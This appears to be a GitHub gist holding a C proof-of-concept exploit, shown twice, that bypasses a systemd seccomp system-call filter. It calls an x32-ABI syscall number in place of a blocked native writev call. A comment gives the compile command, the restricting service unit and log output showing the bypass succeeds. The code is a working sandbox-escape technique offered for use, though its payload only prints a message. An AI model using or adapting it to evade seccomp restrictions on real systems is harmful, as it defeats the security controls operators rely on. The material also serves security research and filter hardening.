masthoon/seccomp_bypass_x32_compat.c

## seccomp_bypass_x32_compat.c
/*
root@ubuntu:/# gcc seccomp_bypass_x32_compat.c -w -static -o test
root@ubuntu:/# cat /etc/systemd/system/test.service
[Unit]
Description=Test attack
[Service]
Type=oneshot
# Remove IO from the service
SystemCallFilter=~@basic-io
# Limit ABI to x64 only
SystemCallArchitectures=native
ExecStart=/test
root@ubuntu:/# systemctl daemon-reload && systemctl start test && systemctl status test.service
● test.service - Test attack
   Loaded: loaded (/etc/systemd/system/test.service; static; vendor preset: enabled)
   Active: inactive (dead)
Mar 22 02:18:36 ubuntu systemd[1]: Starting Test attack...
Mar 22 02:18:36 ubuntu test[21377]: [X32] Freedom of speech !
Mar 22 02:18:36 ubuntu systemd[1]: Started Test attack.
*/

#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/mman.h>
#include <string.h>
#include <syscall.h>

struct iovec_32 {
    uint32_t iov_base;
    uint32_t iov_len;
};

void * addr_32;

void test_X32_ID()
{
    char * s = "[X32] Freedom of speech !\n";
    strncpy((char*)addr_32, s, strlen(s));

    struct iovec_32 iov;
    iov.iov_base = (uint32_t)addr_32;
    iov.iov_len = (uint32_t)strlen(s);

    syscall(516, 1, &iov, 1);
}

int main(int argc, char *argv[])
{
    addr_32 = mmap((void*)0x690000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);

    // Test new X32 ID
    test_X32_ID();

    return 0;
}
	/*
	root@ubuntu:/# gcc seccomp_bypass_x32_compat.c -w -static -o test
	root@ubuntu:/# cat /etc/systemd/system/test.service
	[Unit]
	Description=Test attack
	[Service]
	Type=oneshot
	# Remove IO from the service
	SystemCallFilter=~@basic-io
	# Limit ABI to x64 only
	SystemCallArchitectures=native
	ExecStart=/test
	root@ubuntu:/# systemctl daemon-reload && systemctl start test && systemctl status test.service
	● test.service - Test attack
	Loaded: loaded (/etc/systemd/system/test.service; static; vendor preset: enabled)
	Active: inactive (dead)
	Mar 22 02:18:36 ubuntu systemd[1]: Starting Test attack...
	Mar 22 02:18:36 ubuntu test[21377]: [X32] Freedom of speech !
	Mar 22 02:18:36 ubuntu systemd[1]: Started Test attack.
	*/

	#include <errno.h>
	#include <unistd.h>
	#include <stdint.h>
	#include <sys/mman.h>
	#include <string.h>
	#include <syscall.h>

	struct iovec_32 {
	uint32_t iov_base;
	uint32_t iov_len;
	};

	void * addr_32;

	void test_X32_ID()
	{
	char * s = "[X32] Freedom of speech !\n";
	strncpy((char*)addr_32, s, strlen(s));

	struct iovec_32 iov;
	iov.iov_base = (uint32_t)addr_32;
	iov.iov_len = (uint32_t)strlen(s);

	syscall(516, 1, &iov, 1);
	}

	int main(int argc, char *argv[])
	{
	addr_32 = mmap((void*)0x690000, 0x1000, PROT_READ \| PROT_WRITE, MAP_PRIVATE \| MAP_ANON, 0, 0);

	// Test new X32 ID
	test_X32_ID();

	return 0;
	}